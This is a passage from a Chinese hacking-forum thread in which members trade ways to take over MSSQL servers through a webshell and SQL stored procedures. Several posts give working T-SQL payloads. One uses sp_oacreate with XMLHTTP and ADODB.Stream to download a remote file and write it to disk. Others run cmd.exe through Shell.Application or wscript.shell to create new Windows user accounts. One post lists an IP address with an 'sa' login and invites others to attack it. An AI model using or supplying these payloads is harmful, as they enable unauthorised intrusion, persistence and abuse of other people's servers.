邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]用存储过程一样搞定服务器

39 ‹‹12

打印

[原创]用存储过程一样搞定服务器

lhn

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 79
阅读权限: 40
在线时间: 45 小时
注册时间: 2005-5-18
最后登录: 2008-6-30

发短消息
加为好友
当前离线

26楼 大中小发表于 2007-12-5 10:07 只看该作者

我晕了楼上，明明看到你写了一个asp小马上去了，不会用你的asp小马传dll上去呀。不要告诉我你搞的是web与data分离的。

TOP

伤心的鱼

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 207
精华: 1
积分: 3652
阅读权限: 150
在线时间: 464 小时
注册时间: 2007-4-12
最后登录: 2008-7-22

发短消息
加为好友
当前离线

27楼 大中小发表于 2007-12-5 10:15 只看该作者

我晕了楼上你看到写了一句话上去难道没看到一句话什么权限都没有么？

www.hack521.cn

TOP

邪恶的忧伤

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
性别: 男
在线时间: 1 小时
注册时间: 2007-6-23
最后登录: 2007-12-17

发短消息
加为好友
当前离线

28楼 大中小发表于 2007-12-5 17:45 只看该作者

哈哈。... 直接用 Command.com 执行吧...

呵呵,Just hacking ..

TOP

lhn

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 79
阅读权限: 40
在线时间: 45 小时
注册时间: 2005-5-18
最后登录: 2008-6-30

发短消息
加为好友
当前离线

29楼 大中小发表于 2007-12-6 09:24 只看该作者

引用:

引用第27楼伤心的鱼于2007-12-05 10:15发表的 :
我晕了楼上你看到写了一句话上去难道没看到一句话什么权限都没有么？

文章明明提到是web目录没有写权限，没法写进大马。并不是一句话什么权限都没有。非要用一句话写大马干嘛。搞不明白。用海阳c端提交你的小马，肯定可以找到某个可写的目录（实在找不到没话可说），然后上传dll，这个dll你非要传到web目录下？

TOP

冷阳

晶莹剔透§烈日灼然

Rank: 1

帖子: 5
精华: 0
积分: 17
阅读权限: 40
性别: 男
在线时间: 15 小时
注册时间: 2006-8-11
最后登录: 2008-7-24

发短消息
加为好友
当前离线

30楼 大中小发表于 2007-12-6 17:35 只看该作者

218.21.242.227 sa 麻烦那位看下，和楼主情况一样

TOP

伤心的鱼

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 207
精华: 1
积分: 3652
阅读权限: 150
在线时间: 464 小时
注册时间: 2007-4-12
最后登录: 2008-7-22

发短消息
加为好友
当前离线

31楼 大中小发表于 2007-12-6 20:21 只看该作者

可能我没说清楚事实证明任何盘都没写权限至于dll 不一定要传在WEB目录但是没有目录可写。

www.hack521.cn

TOP

heige

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
性别: 男
在线时间: 16 小时
注册时间: 2007-12-6
最后登录: 2008-2-1

发短消息
加为好友
当前离线

32楼 大中小发表于 2007-12-6 23:34 只看该作者

;DECLARE @B varbinary(8000),@hr int,@http INT,@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output
EXEC @hr = sp_oamethod @http,[Open],null,[GET],[%http%],0
EXEC @hr = sp_oamethod @http,[Send],null
EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output
EXEC @hr=sp_oacreate [ADODB.Stream],@down output
EXEC @hr=sp_OASetProperty @down,[Type],1 EXEC @hr=sp_OASetProperty @down,[mode],3
EXEC @hr=sp_oamethod @down,[Open],null EXEC @hr=sp_oamethod @down,[Write],null,@B
EXEC @hr=sp_oamethod @down,[SaveToFile],null,[%save%],1

TOP

lhn

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 79
阅读权限: 40
在线时间: 45 小时
注册时间: 2005-5-18
最后登录: 2008-6-30

发短消息
加为好友
当前离线

33楼 大中小发表于 2007-12-9 21:07 只看该作者

hege的下载是０字节，不能用。
另：
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user　lhn 123 /add ','c:\windows\system32','',1;

TOP

剑心

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 83
精华: 0
积分: 3045
阅读权限: 100
在线时间: 84 小时
注册时间: 2005-1-2
最后登录: 2008-4-11

发短消息
加为好友
当前离线

34楼 大中小发表于 2007-12-10 09:30 只看该作者

猪三同学是对的

ps

沙盒模式你也得先reg_write下吧
绕大弯了

TOP

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3923
精华: 128
积分: 209640
阅读权限: 200
性别: 男
在线时间: 1096 小时
注册时间: 2007-10-23
最后登录: 2008-7-23

资料收集奖运营支持奖

发短消息
加为好友
当前离线

35楼 大中小发表于 2007-12-10 09:37 只看该作者

沙盒模式都没开启。
SandBoxMode 1

TOP

zczpc2000

晶莹剔透§烈日灼然

Rank: 1

帖子: 31
精华: 0
积分: 96
阅读权限: 40
在线时间: 34 小时
注册时间: 2005-12-30
最后登录: 2008-6-28

发短消息
加为好友
当前离线

36楼 大中小发表于 2007-12-24 13:15 只看该作者

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'd:\xxxxx\cmd.exe /c d:\xxxx\net user gydyhook hook /add'
正好练练手
谢谢猪三哥的提醒...

楼猪虽然走了弯路,但精神可嘉..谢谢各位大哥的赐教